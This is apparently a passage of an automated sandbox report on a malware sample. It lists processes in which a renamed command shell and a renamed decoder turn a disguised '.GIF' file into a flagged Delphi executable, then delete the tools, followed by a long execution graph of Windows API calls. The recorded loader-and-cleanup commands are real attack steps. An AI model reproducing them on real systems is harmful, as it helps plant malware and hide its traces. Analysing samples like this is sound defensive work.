                                                                  Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10
                                                                  Imagebase:0x7ff719660000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:10
                                                                  Start time:03:38:07
                                                                  Start date:26/11/2024
                                                                  Path:C:\Users\Public\kn.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10
                                                                  Imagebase:0x7ff68ac30000
                                                                  File size:1'651'712 bytes
                                                                  MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:11
                                                                  Start time:03:38:08
                                                                  Start date:26/11/2024
                                                                  Path:C:\Users\Public\Libraries\Host.COM
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\Public\Libraries\Host.COM
                                                                  Imagebase:0x400000
                                                                  File size:1'414'656 bytes
                                                                  MD5 hash:7614CE01178ED3B6E66ECCBB0300FCF8
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Borland Delphi
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 68%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Target ID:12
                                                                  Start time:03:38:08
                                                                  Start date:26/11/2024
                                                                  Path:C:\Users\Public\alpha.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                                                                  Imagebase:0x7ff719660000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:13
                                                                  Start time:03:38:08
                                                                  Start date:26/11/2024
                                                                  Path:C:\Users\Public\alpha.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Host.GIF" / A / F / Q / S
                                                                  Imagebase:0x7ff719660000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:5.5%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:29.3%
                                                                    Total number of Nodes:1034
                                                                    Total number of Limit Nodes:25
                                                                    execution_graph 16776 7ff71968f290 16777 7ff71968f2c0 16776->16777 16778 7ff71968f2c7 16776->16778 16785 7ff71966bd38 16777->16785 16778->16777 16779 7ff71968f2f5 16778->16779 16793 7ff719663240 16779->16793 16781 7ff71968f2f3 16796 7ff719678f80 16781->16796 16786 7ff71966bd6f 16785->16786 16791 7ff71966bda2 16785->16791 16786->16791 16804 7ff71968eaf0 16786->16804 16788 7ff71967c4ab 16789 7ff719663240 166 API calls 16788->16789 16788->16791 16790 7ff71967c4bc 16789->16790 16790->16791 16792 7ff719663240 166 API calls 16790->16792 16791->16781 16792->16790 16794 7ff7196632b0 166 API calls 16793->16794 16795 7ff71966326c 16794->16795 16795->16781 16797 7ff719678f89 16796->16797 16798 7ff719678f94 16797->16798 16799 7ff719678fe0 RtlCaptureContext RtlLookupFunctionEntry 16797->16799 16800 7ff719679067 16799->16800 16801 7ff719679025 RtlVirtualUnwind 16799->16801 17261 7ff719678fa4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16800->17261 16801->16800 16809 7ff719663410 16804->16809 16808 7ff71968eb2e 16808->16788 16810 7ff71966345c FormatMessageW 16809->16810 16811 7ff7196812cd _ultoa GetACP 16809->16811 16810->16811 16819 7ff71966348b 16810->16819 16853 7ff719670460 16811->16853 16814 7ff71966349d wcschr 16815 7ff7196634b4 16814->16815 16814->16819 16816 7ff71968121d GetProcessHeap HeapAlloc 16815->16816 16817 7ff7196634c4 FormatMessageW 16815->16817 16818 7ff7196634ef 16816->16818 16822 7ff71968124f FormatMessageW GetProcessHeap RtlFreeHeap 16816->16822 16817->16818 16820 7ff719678f80 7 API calls 16818->16820 16819->16814 16819->16815 16823 7ff7196634ff 16820->16823 16822->16811 16824 7ff71966b998 16823->16824 16855 7ff71966cd90 16824->16855 16827 7ff71966b9a6 16827->16808 16854 7ff719670472 MultiByteToWideChar 16853->16854 16856 7ff71967c84e 16855->16856 16857 7ff71966cda1 GetProcessHeap HeapAlloc 16855->16857 16864 7ff719663278 16856->16864 16857->16856 16859 7ff71966b9a1 16857->16859 16859->16827 16861 7ff71968e91c 16859->16861 17048 7ff71968e9b4 16861->17048 16867 7ff7196632b0 16864->16867 16903 7ff719673578 _get_osfhandle 16867->16903 16870 7ff7196632f0 _get_osfhandle GetConsoleScreenBufferInfo 16871 7ff71966331d 16870->16871 16872 7ff719663410 18 API calls 16871->16872 16884 7ff71966333d 16872->16884 16873 7ff7196633a8 16878 7ff7196811ff 16873->16878 16891 7ff7196633b0 16873->16891 16874 7ff719663368 WriteConsoleW 16876 7ff7196811cc GetLastError 16874->16876 16874->16884 16876->16884 16877 7ff719681057 GetConsoleScreenBufferInfo 16880 7ff719681079 WriteConsoleW 16877->16880 16877->16884 16918 7ff719674c1c 16878->16918 16879 7ff719678f80 7 API calls 16885 7ff7196632a4 16879->16885 16880->16884 16886 7ff7196810a8 9 API calls 16880->16886 16882 7ff7196811df GetLastError 16882->16873 16883 7ff719663400 16883->16882 16884->16873 16884->16874 16884->16876 16884->16877 16884->16882 16884->16883 16910 7ff7196736ec _get_osfhandle 16884->16910 16886->16884 16887 7ff719681181 16886->16887 16917 7ff71968bde4 EnterCriticalSection LeaveCriticalSection 16887->16917 16891->16879 16904 7ff719673599 GetFileType 16903->16904 16905 7ff7196632e8 16903->16905 16904->16905 16908 7ff7196735b1 16904->16908 16905->16870 16905->16871 16906 7ff71967e940 16907 7ff7196735c3 GetStdHandle 16909 7ff7196735d2 AcquireSRWLockShared GetConsoleMode ReleaseSRWLockShared 16907->16909 16908->16906 16908->16907 16908->16909 16909->16905 16911 7ff71967e95c WriteFile 16910->16911 16916 7ff719673731 16910->16916 16912 7ff71967e980 WideCharToMultiByte WriteFile 16911->16912 16915 7ff7196737a1 16912->16915 16912->16916 16913 7ff719673747 16914 7ff71967374b WideCharToMultiByte WriteFile 16913->16914 16913->16915 16914->16915 16915->16884 16916->16912 16916->16913 16916->16915 16919 7ff719674c24 16918->16919 16921 7ff719674c2f exit 16919->16921 16922 7ff719674c50 16919->16922 16928 7ff719674cb0 16922->16928 16924 7ff719674c6c 16924->16919 16930 7ff719674cfa 16928->16930 16933 7ff719674cda 16928->16933 16929 7ff719678f80 7 API calls 16931 7ff719674c64 16929->16931 16932 7ff71967eefe realloc 16930->16932 16930->16933 16931->16924 16934 7ff719673c24 16931->16934 16932->16933 16933->16929 16935 7ff719673c67 16934->16935 16981 7ff71967412c 16935->16981 16999 7ff71966ca40 16935->16999 16937 7ff719678f80 7 API calls 16939 7ff71967413e GetProcessHeap RtlFreeHeap 16937->16939 16939->16924 16940 7ff71967ec97 16941 7ff71967855c ??_V@YAXPEAX 16940->16941 16943 7ff71967eca1 16941->16943 16945 7ff719673cb8 GetCurrentDirectoryW towupper iswalpha 16947 7ff719673fb8 16945->16947 16948 7ff719673d68 16945->16948 16950 7ff719673fc6 GetLastError 16947->16950 16948->16947 16949 7ff719673d72 towupper GetFullPathNameW 16948->16949 16949->16950 16951 7ff719673dd3 16949->16951 17041 7ff71967855c 16950->17041 16955 7ff719673fe0 16951->16955 16961 7ff719673de3 16951->16961 16953 7ff7196740fe 16957 7ff71967855c ??_V@YAXPEAX 16953->16957 16954 7ff71967855c ??_V@YAXPEAX 16956 7ff719673ffb _local_unwind 16954->16956 16955->16954 16958 7ff71967400c GetLastError 16956->16958 16959 7ff719674108 _local_unwind 16957->16959 16962 7ff719674028 16958->16962 16963 7ff719673e95 16958->16963 16960 7ff719673f98 16959->16960 17044 7ff71966ff70 16960->17044 16961->16953 16970 7ff719673e66 GetFileAttributesW 16961->16970 16962->16963 16965 7ff719674031 16962->16965 16966 7ff719673ecf 16963->16966 17014 7ff719672978 16963->17014 16971 7ff71967855c ??_V@YAXPEAX 16965->16971 16968 7ff719673f08 16966->16968 16969 7ff719673ed5 GetFileAttributesW 16966->16969 16977 7ff719673f1e SetCurrentDirectoryW 16968->16977 16983 7ff719673f46 16968->16983 16975 7ff719673efd 16969->16975 16976 7ff719674067 GetLastError 16969->16976 16970->16958 16970->16963 16978 7ff71967403b _local_unwind 16971->16978 16973 7ff719673ec7 16973->16966 16979 7ff71967404c 16973->16979 16974 7ff71967855c ??_V@YAXPEAX 16974->16981 16975->16968 16982 7ff71967409d 16975->16982 16980 7ff71967855c ??_V@YAXPEAX 16976->16980 16977->16983 16984 7ff7196740b8 GetLastError 16977->16984 16978->16979 16989 7ff71967855c ??_V@YAXPEAX 16979->16989 16985 7ff71967408c _local_unwind 16980->16985 16981->16937 16986 7ff71967855c ??_V@YAXPEAX 16982->16986 17027 7ff71967498c 16983->17027 16987 7ff71967855c ??_V@YAXPEAX 16984->16987 16985->16982 16991 7ff7196740a7 _local_unwind 16986->16991 16992 7ff7196740d2 _local_unwind 16987->16992 16990 7ff719674056 _local_unwind 16989->16990 16990->16976 16991->16984 16994 7ff7196740e3 16992->16994 16996 7ff71967855c ??_V@YAXPEAX 16994->16996 16995 7ff719673f6f 17032 7ff71967417c 16995->17032 16998 7ff7196740ed _local_unwind 16996->16998 16998->16953 17000 7ff71966ca59 16999->17000 17001 7ff71966cab8 16999->17001 17002 7ff719679324 malloc 17000->17002 17001->16940 17010 7ff71966b900 17001->17010 17003 7ff71966ca7b 17002->17003 17004 7ff71966ca84 17003->17004 17005 7ff71967c6e0 17003->17005 17006 7ff71966ca9b memset 17004->17006 17007 7ff71967c706 ??_V@YAXPEAX 17004->17007 17008 7ff719686d1c 14 API calls 17005->17008 17006->17001 17008->17001 17011 7ff71966b914 17010->17011 17011->17011 17012 7ff71966cd90 166 API calls 17011->17012 17013 7ff71966b92a 17012->17013 17013->16940 17013->16945 17015 7ff7196729b9 17014->17015 17015->17015 17016 7ff71967e3f7 17015->17016 17017 7ff719672a1e FindFirstFileW 17015->17017 17019 7ff7196729ed 17015->17019 17020 7ff719672aeb _wcsnicmp 17015->17020 17023 7ff71967e3d6 _wcsicmp 17015->17023 17024 7ff719672a9d memmove 17015->17024 17025 7ff71967e404 memmove 17015->17025 17016->16973 17017->17016 17018 7ff719672a44 FindClose 17017->17018 17018->17015 17021 7ff719678f80 7 API calls 17019->17021 17020->17015 17022 7ff719672a02 17021->17022 17022->16973 17023->17015 17023->17016 17024->17015 17025->17016 17028 7ff7196749ba SetEnvironmentVariableW GetProcessHeap RtlFreeHeap 17027->17028 17029 7ff7196749a4 17027->17029 17030 7ff719674a14 GetEnvironmentStringsW GetProcessHeap HeapAlloc memmove FreeEnvironmentStringsW 17028->17030 17029->17028 17031 7ff719673f67 17030->17031 17031->16994 17031->16995 17033 7ff7196741a8 GetCurrentDirectoryW 17032->17033 17034 7ff7196741d4 towupper 17032->17034 17040 7ff7196741b9 17033->17040 17035 7ff71967081c 163 API calls 17034->17035 17037 7ff719674204 17035->17037 17036 7ff719678f80 7 API calls 17038 7ff7196741c8 17036->17038 17039 7ff71967ecac towupper 17037->17039 17037->17040 17038->16960 17040->17036 17042 7ff719678574 ??_V@YAXPEAX 17041->17042 17043 7ff719678583 17041->17043 17042->17043 17043->16955 17045 7ff71966ff7c 17044->17045 17046 7ff71966ffdb 17044->17046 17045->17046 17047 7ff71966ffb5 GetProcessHeap RtlFreeHeap 17045->17047 17046->16974 17047->17046 17050 7ff71968ea0f 17048->17050 17051 7ff71968e9d9 17048->17051 17049 7ff71968ea67 17078 7ff71968c978 17049->17078 17050->17049 17073 7ff71966af98 17050->17073 17060 7ff719666a48 17051->17060 17055 7ff71968ea6c 17057 7ff71968eaae 17055->17057 17088 7ff71966d208 17055->17088 17056 7ff71968eacf 17057->17056 17093 7ff719673a0c 17057->17093 17061 7ff719666b23 17060->17061 17063 7ff719666a51 17060->17063 17061->17050 17062 7ff71968417c 17103 7ff71968ec14 memset 17062->17103 17063->17061 17063->17062 17064 7ff719666ab2 17063->17064 17066 7ff719673c24 166 API calls 17064->17066 17068 7ff719666abf GetProcessHeap RtlFreeHeap 17066->17068 17099 7ff719666b84 SetEnvironmentStringsW GetProcessHeap RtlFreeHeap 17068->17099 17074 7ff71966afb1 17073->17074 17075 7ff71966afdb 17074->17075 17077 7ff71966d208 _close 17074->17077 17259 7ff71966b038 _dup2 17074->17259 17075->17050 17077->17074 17079 7ff71968ca9e 17078->17079 17080 7ff71968c98e 17078->17080 17079->17055 17081 7ff71968ee4c TerminateProcess GetLastError 17080->17081 17082 7ff71968c9b3 17080->17082 17081->17080 17082->17079 17083 7ff719675cb4 7 API calls 17082->17083 17084 7ff71966d208 _close 17082->17084 17085 7ff71968ca21 _get_osfhandle FlushFileBuffers 17082->17085 17087 7ff71966b038 _dup2 17082->17087 17083->17082 17084->17082 17086 7ff71966b038 _dup2 17085->17086 17086->17082 17087->17082 17089 7ff71966d246 17088->17089 17090 7ff71966d211 17088->17090 17089->17055 17091 7ff71966d238 _close 17090->17091 17092 7ff71967ca0e 17090->17092 17091->17089 17092->17055 17094 7ff719673a53 FindClose 17093->17094 17098 7ff719673a25 17093->17098 17095 7ff719673a66 17094->17095 17096 7ff719673a74 GetLastError 17094->17096 17095->17057 17096->17095 17097 7ff71967ec38 17098->17094 17098->17097 17124 7ff719674a14 GetEnvironmentStringsW 17099->17124 17102 7ff719666b30 GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 17104 7ff71966ca40 17 API calls 17103->17104 17105 7ff71968ec96 17104->17105 17106 7ff71968edf7 17105->17106 17130 7ff71967081c GetEnvironmentVariableW 17105->17130 17107 7ff71968ee16 17106->17107 17108 7ff71968ee0a ??_V@YAXPEAX 17106->17108 17110 7ff719678f80 7 API calls 17107->17110 17108->17107 17112 7ff719684190 17110->17112 17113 7ff71968ecd2 SetCurrentDirectoryW 17115 7ff71968edd4 17113->17115 17116 7ff71968ece9 SetErrorMode 17113->17116 17114 7ff71968ecfb 17117 7ff71967498c 8 API calls 17114->17117 17119 7ff71967417c 166 API calls 17115->17119 17116->17114 17118 7ff71968ed89 SetCurrentDirectoryW 17117->17118 17120 7ff71968edc1 17118->17120 17121 7ff71968edac GetLastError 17118->17121 17119->17106 17120->17115 17123 7ff71968edc6 SetErrorMode 17120->17123 17122 7ff719663278 166 API calls 17121->17122 17122->17120 17123->17115 17125 7ff719666ae8 17124->17125 17126 7ff719674a40 GetProcessHeap HeapAlloc 17124->17126 17125->17102 17128 7ff719674a91 memmove 17126->17128 17129 7ff719674a9f FreeEnvironmentStringsW 17126->17129 17128->17129 17129->17125 17131 7ff71967085e 17130->17131 17132 7ff719670877 17130->17132 17131->17113 17131->17114 17133 7ff719670884 _wcsicmp 17132->17133 17134 7ff719670970 17132->17134 17135 7ff7196708a2 _wcsicmp 17133->17135 17136 7ff719670989 17133->17136 17151 7ff719673140 17134->17151 17135->17136 17137 7ff7196708c0 _wcsicmp 17135->17137 17138 7ff71967417c 154 API calls 17136->17138 17177 7ff7196733f0 17136->17177 17181 7ff719666ee4 17136->17181 17215 7ff719679158 RtlCaptureContext RtlLookupFunctionEntry 17136->17215 17137->17136 17139 7ff7196708de _wcsicmp 17137->17139 17138->17136 17142 7ff7196708fc _wcsicmp 17139->17142 17143 7ff71967d8d3 GetCommandLineW 17139->17143 17142->17136 17144 7ff71967091a _wcsicmp 17142->17144 17146 7ff71967d8e5 rand 17143->17146 17144->17134 17147 7ff719670934 _wcsicmp 17144->17147 17146->17136 17147->17146 17149 7ff719670952 _wcsicmp 17147->17149 17149->17134 17150 7ff71967d8f9 GetNumaHighestNodeNumber 17149->17150 17150->17136 17152 7ff71967e59e 17151->17152 17153 7ff719673184 GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 17151->17153 17220 7ff719688654 17152->17220 17155 7ff71967e5ed 17153->17155 17156 7ff7196731e0 17153->17156 17158 7ff71967e5fe 17155->17158 17166 7ff71967e750 17155->17166 17157 7ff71967e5a8 17156->17157 17159 7ff7196731ff 17156->17159 17226 7ff719673448 17157->17226 17231 7ff719675508 GetUserDefaultLCID 17158->17231 17160 7ff7196733f0 _vsnwprintf 17159->17160 17164 7ff719673247 17160->17164 17167 7ff719678f80 7 API calls 17164->17167 17165 7ff7196733f0 _vsnwprintf 17172 7ff71967e748 17165->17172 17166->17165 17169 7ff719673266 17167->17169 17168 7ff71967e711 17170 7ff719675508 GetUserDefaultLCID 17168->17170 17169->17136 17173 7ff71967e716 GetTimeFormatW 17170->17173 17171 7ff71967e5e8 17172->17171 17233 7ff7196734a0 17172->17233 17173->17172 17175 7ff71967e629 17175->17168 17176 7ff71967e6e7 memmove 17175->17176 17176->17175 17178 7ff719673421 17177->17178 17179 7ff719673433 17177->17179 17256 7ff719673684 _vsnwprintf 17178->17256 17179->17136 17182 7ff719666f30 GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 17181->17182 17208 7ff719666fbf 17181->17208 17183 7ff719666f90 17182->17183 17190 7ff7196842b6 17182->17190 17185 7ff719675508 GetUserDefaultLCID 17183->17185 17184 7ff719688654 9 API calls 17184->17208 17186 7ff719666f97 GetLocaleInfoW 17185->17186 17186->17208 17187 7ff719684322 realloc 17188 7ff71968433f 17187->17188 17187->17190 17189 7ff7196733f0 _vsnwprintf 17188->17189 17197 7ff71968437d 17189->17197 17190->17187 17190->17188 17192 7ff719663278 153 API calls 17190->17192 17191 7ff719675508 GetUserDefaultLCID 17193 7ff719667042 GetDateFormatW 17191->17193 17192->17190 17194 7ff71966707a 17193->17194 17195 7ff719675508 GetUserDefaultLCID 17194->17195 17201 7ff71966708a 17194->17201 17196 7ff71966714a GetDateFormatW 17195->17196 17198 7ff719667175 realloc 17196->17198 17199 7ff7196842a0 GetLastError 17196->17199 17203 7ff7196843ea 17197->17203 17209 7ff7196843fb 17197->17209 17198->17190 17202 7ff71966719c 17198->17202 17199->17190 17200 7ff71968427f memmove 17200->17208 17201->17197 17212 7ff7196670bd 17201->17212 17204 7ff719675508 GetUserDefaultLCID 17202->17204 17206 7ff719673448 153 API calls 17203->17206 17207 7ff7196671ae GetDateFormatW 17204->17207 17205 7ff719667020 memmove 17205->17208 17211 7ff7196843f9 17206->17211 17207->17199 17207->17208 17208->17184 17208->17191 17208->17200 17208->17205 17210 7ff719673448 153 API calls 17209->17210 17210->17211 17212->17211 17212->17212 17213 7ff719678f80 7 API calls 17212->17213 17214 7ff719667129 17213->17214 17214->17136 17216 7ff7196791d7 17215->17216 17217 7ff719679195 RtlVirtualUnwind 17215->17217 17258 7ff719678fa4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17216->17258 17217->17216 17221 7ff719688673 GetSystemTime 17220->17221 17222 7ff719688686 17220->17222 17223 7ff7196886cc SystemTimeToFileTime 17221->17223 17222->17223 17224 7ff719678f80 7 API calls 17223->17224 17225 7ff7196886ed 17224->17225 17225->17157 17227 7ff71967363c _vsnwprintf 17226->17227 17228 7ff71967347b 17227->17228 17229 7ff7196734a0 166 API calls 17228->17229 17230 7ff719673491 17229->17230 17230->17171 17232 7ff719675529 GetLocaleInfoW 17231->17232 17232->17175 17234 7ff7196734bf 17233->17234 17250 7ff7196734f5 17233->17250 17235 7ff719673578 6 API calls 17234->17235 17236 7ff7196734c9 17235->17236 17237 7ff71967350d AcquireSRWLockShared _get_osfhandle WriteConsoleW 17236->17237 17238 7ff7196734cd 17236->17238 17240 7ff719673557 ReleaseSRWLockShared 17237->17240 17241 7ff71967e8d2 GetLastError 17237->17241 17239 7ff7196736ec 6 API calls 17238->17239 17242 7ff7196734e1 17239->17242 17240->17242 17243 7ff71967e8e5 GetLastError 17241->17243 17242->17243 17242->17250 17244 7ff7196701b8 6 API calls 17243->17244 17245 7ff71967e904 17244->17245 17246 7ff71967e918 17245->17246 17247 7ff71967e908 17245->17247 17249 7ff71968f318 _get_osfhandle GetFileType 17246->17249 17248 7ff719663278 160 API calls 17247->17248 17248->17250 17251 7ff71967e91f 17249->17251 17250->17171 17252 7ff71967e923 17251->17252 17253 7ff71967e931 17251->17253 17254 7ff719663278 160 API calls 17252->17254 17255 7ff71968f1d8 160 API calls 17253->17255 17254->17250 17255->17250 17257 7ff7196736b7 17256->17257 17257->17179 17260 7ff71966b061 17259->17260 17260->17074 17262 7ff719689690 17263 7ff71968969f 17262->17263 17264 7ff7196896b7 17262->17264 17268 7ff719689308 17263->17268 17266 7ff719689308 226 API calls 17264->17266 17267 7ff7196896a4 17266->17267 17269 7ff71968932c 17268->17269 17270 7ff719689327 17268->17270 17272 7ff719689383 17269->17272 17273 7ff71968934b wcschr 17269->17273 17283 7ff7196709f4 17270->17283 17288 7ff71966d3f0 17272->17288 17273->17272 17274 7ff719689361 17273->17274 17277 7ff71967498c 8 API calls 17274->17277 17282 7ff719689381 17277->17282 17278 7ff7196893a8 17279 7ff71967081c 166 API calls 17278->17279 17280 7ff7196893bd 17279->17280 17281 7ff719673448 166 API calls 17280->17281 17281->17282 17282->17267 17284 7ff719670a0b iswspace 17283->17284 17285 7ff719670a3c 17283->17285 17286 7ff719670a21 wcschr 17284->17286 17287 7ff719670a50 17284->17287 17285->17269 17286->17285 17286->17287 17287->17284 17287->17285 17287->17286 17289 7ff71966d810 17288->17289 17290 7ff71966d420 17288->17290 17291 7ff71966b998 207 API calls 17289->17291 17292 7ff71967caad 17290->17292 17293 7ff71966d46e GetProcessHeap HeapAlloc 17290->17293 17298 7ff71966d515 17291->17298 17294 7ff719663278 166 API calls 17292->17294 17293->17292 17299 7ff71966d49a 17293->17299 17295 7ff71967cab7 17294->17295 17296 7ff71968e91c 198 API calls 17308 7ff71966d544 17296->17308 17297 7ff719679158 7 API calls 17297->17308 17298->17308 17299->17298 17300 7ff71966d4e8 wcschr 17299->17300 17299->17308 17300->17299 17301 7ff71967ca31 wcschr 17301->17308 17302 7ff71966d54a iswspace 17305 7ff71966d561 wcschr 17302->17305 17302->17308 17303 7ff71966d5ee GetProcessHeap HeapReAlloc 17303->17292 17304 7ff71966d61d GetProcessHeap HeapSize 17303->17304 17304->17308 17305->17308 17306 7ff71966d586 wcschr 17306->17308 17307 7ff71966d6ff iswspace 17307->17308 17309 7ff71966d712 wcschr 17307->17309 17308->17292 17308->17296 17308->17297 17308->17301 17308->17302 17308->17303 17308->17306 17308->17307 17310 7ff71966d668 17308->17310 17312 7ff71966d6c5 wcschr 17308->17312 17313 7ff71966d759 wcschr 17308->17313 17315 7ff71967ca5a wcschr 17308->17315 17309->17308 17311 7ff719678f80 7 API calls 17310->17311 17314 7ff71966d6a0 17311->17314 17312->17308 17313->17308 17314->17274 17314->17278 17315->17308 16723 7ff719678d80 16724 7ff719678da4 16723->16724 16725 7ff719678db6 16724->16725 16726 7ff719678dbf Sleep 16724->16726 16727 7ff719678ddb _amsg_exit 16725->16727 16729 7ff719678de7 16725->16729 16726->16724 16727->16729 16728 7ff719678e56 _initterm 16730 7ff719678e73 _IsNonwritableInCurrentImage 16728->16730 16729->16728 16729->16730 16736 7ff719678e3c 16729->16736 16737 7ff7196737d8 GetCurrentThreadId OpenThread 16730->16737 16770 7ff7196704f4 16737->16770 16739 7ff719673839 HeapSetInformation RegOpenKeyExW 16740 7ff71967388d 16739->16740 16741 7ff71967e9f8 RegQueryValueExW RegCloseKey 16739->16741 16742 7ff719675920 VirtualQuery VirtualQuery 16740->16742 16744 7ff71967ea41 GetThreadLocale 16741->16744 16743 7ff7196738ab GetConsoleOutputCP GetCPInfo 16742->16743 16743->16744 16745 7ff7196738f1 memset 16743->16745 16761 7ff719673919 16744->16761 16745->16761 16746 7ff719674d5c 391 API calls 16746->16761 16747 7ff71967eb27 _setjmp 16747->16761 16748 7ff719673948 _setjmp 16748->16761 16749 7ff719688530 370 API calls 16749->16761 16750 7ff719663240 166 API calls 16750->16761 16751 7ff7196701b8 6 API calls 16751->16761 16752 7ff719674c1c 166 API calls 16752->16761 16753 7ff71966df60 481 API calls 16753->16761 16754 7ff71967eb71 _setmode 16754->16761 16755 7ff7196786f0 182 API calls 16755->16761 16756 7ff719670580 12 API calls 16757 7ff71967398b GetConsoleOutputCP GetCPInfo 16756->16757 16759 7ff7196704f4 GetModuleHandleW GetProcAddress SetThreadLocale 16757->16759 16758 7ff7196758e4 EnterCriticalSection LeaveCriticalSection 16758->16761 16759->16761 16760 7ff71966be00 647 API calls 16760->16761 16761->16741 16761->16746 16761->16747 16761->16748 16761->16749 16761->16750 16761->16751 16761->16752 16761->16753 16761->16754 16761->16755 16761->16756 16761->16758 16761->16760 16762 7ff7196758e4 EnterCriticalSection LeaveCriticalSection 16761->16762 16763 7ff71967ebbe GetConsoleOutputCP GetCPInfo 16762->16763 16764 7ff7196704f4 GetModuleHandleW GetProcAddress SetThreadLocale 16763->16764 16765 7ff71967ebe6 16764->16765 16766 7ff71966be00 647 API calls 16765->16766 16767 7ff719670580 12 API calls 16765->16767 16766->16765 16768 7ff71967ebfc GetConsoleOutputCP GetCPInfo 16767->16768 16769 7ff7196704f4 GetModuleHandleW GetProcAddress SetThreadLocale 16768->16769 16769->16761 16771 7ff719670504 16770->16771 16772 7ff71967051e GetModuleHandleW 16771->16772 16773 7ff71967054d GetProcAddress 16771->16773 16774 7ff71967056c SetThreadLocale 16771->16774 16772->16771 16773->16771 22097 7ff71966b3f0 22100 7ff71966b41a 22097->22100 22098 7ff71967c2a3 iswdigit 22099 7ff71967c2b7 22098->22099 22098->22100 22101 7ff719663278 166 API calls 22099->22101 22100->22098 22102 7ff71966b42f 22100->22102 22104 7ff71966b461 22101->22104 22105 7ff71966be00 22102->22105 22106 7ff71966bec8 22105->22106 22107 7ff71966be1b 22105->22107 22106->22104 22107->22106 22108 7ff71966be67 22107->22108 22109 7ff71966be47 memset 22107->22109 22111 7ff71966be73 22108->22111 22113 7ff71966bf29 22108->22113 22114 7ff71966beaf 22108->22114 22212 7ff71966bff0 22109->22212 22112 7ff71966be92 22111->22112 22117 7ff71966bf0c 22111->22117 22123 7ff71966bea1 22112->22123 22139 7ff71966c620 GetConsoleTitleW 22112->22139 22115 7ff71966cd90 166 API calls 22113->22115 22114->22106 22120 7ff71966bff0 185 API calls 22114->22120 22116 7ff71966bf33 22115->22116 22116->22114 22121 7ff71966bf70 22116->22121 22124 7ff7196688a8 _wcsicmp 22116->22124 22250 7ff71966b0d8 memset 22117->22250 22120->22106 22133 7ff71966bf75 22121->22133 22310 7ff7196671ec 22121->22310 22123->22114 22129 7ff71966af98 2 API calls 22123->22129 22128 7ff71966bf5a 22124->22128 22125 7ff71966bf1e 22125->22114 22127 7ff71966bfa9 22127->22114 22130 7ff71966cd90 166 API calls 22127->22130 22128->22121 22131 7ff719670a6c 273 API calls 22128->22131 22129->22114 22132 7ff71966bfbb 22130->22132 22131->22121 22132->22114 22134 7ff71967081c 166 API calls 22132->22134 22135 7ff71966b0d8 194 API calls 22133->22135 22134->22133 22136 7ff71966bf7f 22135->22136 22136->22114 22183 7ff719675ad8 22136->22183 22140 7ff71966ca2f 22139->22140 22142 7ff71966c675 22139->22142 22141 7ff71967c5fc GetLastError 22140->22141 22144 7ff719663278 166 API calls 22140->22144 22145 7ff71967855c ??_V@YAXPEAX 22140->22145 22141->22140 22143 7ff71966ca40 17 API calls 22142->22143 22151 7ff71966c69b 22143->22151 22144->22140 22145->22140 22146 7ff71966c9b5 22150 7ff71967855c ??_V@YAXPEAX 22146->22150 22147 7ff7196689c0 23 API calls 22177 7ff71966c964 22147->22177 22148 7ff71966c978 towupper 22148->22177 22149 7ff71967855c ??_V@YAXPEAX 22171 7ff71966c762 22149->22171 22169 7ff71966c855 22150->22169 22151->22140 22151->22146 22152 7ff71966d3f0 223 API calls 22151->22152 22151->22171 22154 7ff71966c741 22152->22154 22153 7ff71968ec14 173 API calls 22153->22171 22156 7ff71966c74d 22154->22156 22159 7ff71966c8b5 wcsncmp 22154->22159 22155 7ff71966c872 22157 7ff71967855c ??_V@YAXPEAX 22155->22157 22162 7ff71966bd38 207 API calls 22156->22162 22156->22171 22160 7ff71966c87c 22157->22160 22158 7ff71967c6b8 SetConsoleTitleW 22158->22155 22159->22156 22159->22171 22163 7ff719678f80 7 API calls 22160->22163 22161 7ff71966c83d 22316 7ff71966cb40 22161->22316 22162->22171 22165 7ff71966c88e 22163->22165 22165->22123 22166 7ff71966c78a wcschr 22166->22171 22168 7ff71967291c 8 API calls 22168->22171 22169->22155 22169->22158 22170 7ff71966ca25 22174 7ff719663278 166 API calls 22170->22174 22171->22140 22171->22149 22171->22161 22171->22166 22171->22168 22171->22170 22171->22171 22173 7ff71967c684 22171->22173 22176 7ff71966ca2a 22171->22176 22171->22177 22175 7ff719663278 166 API calls 22173->22175 22174->22140 